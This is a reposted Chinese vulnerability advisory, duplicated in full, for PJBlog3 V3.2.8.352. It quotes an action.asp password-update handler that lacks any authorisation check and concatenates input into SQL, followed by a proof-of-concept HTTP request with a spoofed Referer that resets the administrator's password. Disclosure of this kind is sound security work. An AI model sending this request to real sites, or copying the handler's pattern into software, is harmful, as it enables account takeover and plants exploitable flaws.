PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码
程序员文章站
2022-07-03 10:05:18
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术... 11-12-13...
发布日期:2011-06.19
发布作者:佚名
影响版本:pjblog3 v3.2.8.352
漏洞类型:设计错误
漏洞描述:pjblog一套开源免费的中文个人博客系统程序,采用asp+access的技术,具有相当高的运作效能以及更新率,也支持目前blog所使用的新技术
在文件action.asp中:
elseif request.querystring("action") = "updatepassto" then //第307行
if chkpost() then
dim e_pass, e_repass, e_id, e_rs, e_hash, d_pass
e_id = checkstr(unescape(request.querystring("id")))
e_pass = checkstr(unescape(request.querystring("pass")))
e_repass = checkstr(unescape(request.querystring("repass")))
set e_rs = server.createobject("adodb.recordset")
e_rs.open "select * from [blog_member] where [mem_id]="&e_id, conn, 1, 3
e_hash = e_rs("mem_salt")
d_pass = sha1(e_pass&e_hash)
e_rs("mem_password") = d_pass
e_rs.update
e_rs.close
set e_rs = nothing
response.write("1")
else
response.write lang.err.info(999)
end if
程序在修改用户的密码时,没有对用户的合法权限做验证,导致攻击者可以修改任意用户的密码。 应该先判断用户权限
测试方法:
//需修改referer值通过程序检测
get /action.asp?action=updatepassto&id=1&pass=123456&repass=test http/1.1
accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://127.0.0.1/test.htm
accept-language: zh-cn
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; sv1; tencenttraveler 4.0; .net clr 1.1.4322; .net clr 2.0.50727)
host: 127.0.0.1
connection: keep-alive
cookie: pjblog3setting=viewtype=normal; pjblog3=memright=000000110000&memhashkey=&memname=&disvalidate=false&memlastpost=2009%2d11%2d08+11%3a18%3a27&exp=2010%2d11%2d8&guest=%7brecord%3atrue%2cusername%3a%27test%27%2cuseremail%3a%27ww%40126%2ecom%27%2cuserwebsite%3a%27http%3a%2f%2fwww%2ebaidu%2ecom%2findex%3f%26lt%3bfff%26gt%3b%27%7d; aspsessionidasdssadd=damnklbdkadfckogkejokjpp; aspsessionidcqcqtbcd=mojflccdbichalbbggmmenml
(测试结果:成功修改管理密码)
发布作者:佚名
影响版本:pjblog3 v3.2.8.352
漏洞类型:设计错误
漏洞描述:pjblog一套开源免费的中文个人博客系统程序,采用asp+access的技术,具有相当高的运作效能以及更新率,也支持目前blog所使用的新技术
在文件action.asp中:
复制代码
代码如下:elseif request.querystring("action") = "updatepassto" then //第307行
if chkpost() then
dim e_pass, e_repass, e_id, e_rs, e_hash, d_pass
e_id = checkstr(unescape(request.querystring("id")))
e_pass = checkstr(unescape(request.querystring("pass")))
e_repass = checkstr(unescape(request.querystring("repass")))
set e_rs = server.createobject("adodb.recordset")
e_rs.open "select * from [blog_member] where [mem_id]="&e_id, conn, 1, 3
e_hash = e_rs("mem_salt")
d_pass = sha1(e_pass&e_hash)
e_rs("mem_password") = d_pass
e_rs.update
e_rs.close
set e_rs = nothing
response.write("1")
else
response.write lang.err.info(999)
end if
程序在修改用户的密码时,没有对用户的合法权限做验证,导致攻击者可以修改任意用户的密码。 应该先判断用户权限
测试方法:
复制代码
代码如下://需修改referer值通过程序检测
get /action.asp?action=updatepassto&id=1&pass=123456&repass=test http/1.1
accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
referer: http://127.0.0.1/test.htm
accept-language: zh-cn
ua-cpu: x86
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; sv1; tencenttraveler 4.0; .net clr 1.1.4322; .net clr 2.0.50727)
host: 127.0.0.1
connection: keep-alive
cookie: pjblog3setting=viewtype=normal; pjblog3=memright=000000110000&memhashkey=&memname=&disvalidate=false&memlastpost=2009%2d11%2d08+11%3a18%3a27&exp=2010%2d11%2d8&guest=%7brecord%3atrue%2cusername%3a%27test%27%2cuseremail%3a%27ww%40126%2ecom%27%2cuserwebsite%3a%27http%3a%2f%2fwww%2ebaidu%2ecom%2findex%3f%26lt%3bfff%26gt%3b%27%7d; aspsessionidasdssadd=damnklbdkadfckogkejokjpp; aspsessionidcqcqtbcd=mojflccdbichalbbggmmenml
(测试结果:成功修改管理密码)
下一篇: 浅析Linux系统后门技术和实践方法